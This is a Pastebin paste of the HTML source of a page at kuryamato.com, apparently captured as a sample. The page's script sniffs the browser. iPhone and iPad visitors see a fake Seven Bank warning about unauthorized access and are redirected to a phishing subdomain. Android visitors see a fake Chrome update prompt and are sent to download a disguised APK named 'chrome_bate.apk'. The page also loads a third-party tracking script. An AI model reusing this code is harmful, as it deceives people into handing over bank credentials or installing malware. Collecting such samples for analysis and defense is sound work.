Advertisement
ozuma5119

html/kuryamato.com

Jul 18th, 2020
2,230
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.54 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  2. <html lang="ja"><head>
  3. <script type="text/javascript" src="https://js.users.51.la/20801269.js"></script>
  4. <meta http-equiv="content-type" content="text/html; charset=Shift_JIS">
  5.     <head>
  6.         <title></title>
  7.  
  8.     </head>
  9.     <body>
  10.     <script >
  11.             var browser = {
  12.             versions: function () {
  13.                 var u = navigator.userAgent, app = navigator.appVersion;
  14.                 return {
  15.                     trident: u.indexOf('Trident') > -1,
  16.                     presto: u.indexOf('Presto') > -1,
  17.                     webKit: u.indexOf('AppleWebKit') > -1,
  18.                     gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1,
  19.                     mobile: !!u.match(/AppleWebKit.*Mobile.*/),
  20.                     ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
  21.                     android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,
  22.                     iPhone: u.indexOf('iPhone') > -1,
  23.                     iPad: u.indexOf('iPad') > -1,
  24.                 };
  25.             }(),
  26.             language: (navigator.browserLanguage || navigator.language).toLowerCase()
  27.         };
  28.        
  29.         if (browser.versions.ios || browser.versions.iPhone || browser.versions.iPad ) {
  30.             window.alert("【セブン銀行】お客様がご利用のセブン銀行に対し、第三者からの不正なアクセスを検知しました。ご確認ください。");
  31.             window.location.href='https://seven.kuryamato.com';
  32.         }  else if (browser.versions.android) {
  33.             window.alert("セキュリティ向上のため,最新バージョンのChromeにアップデートしてください.");
  34.             window.location.href = "/file/chrome_bate.apk";
  35.         }
  36.     </script>
  37.    
  38.     </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement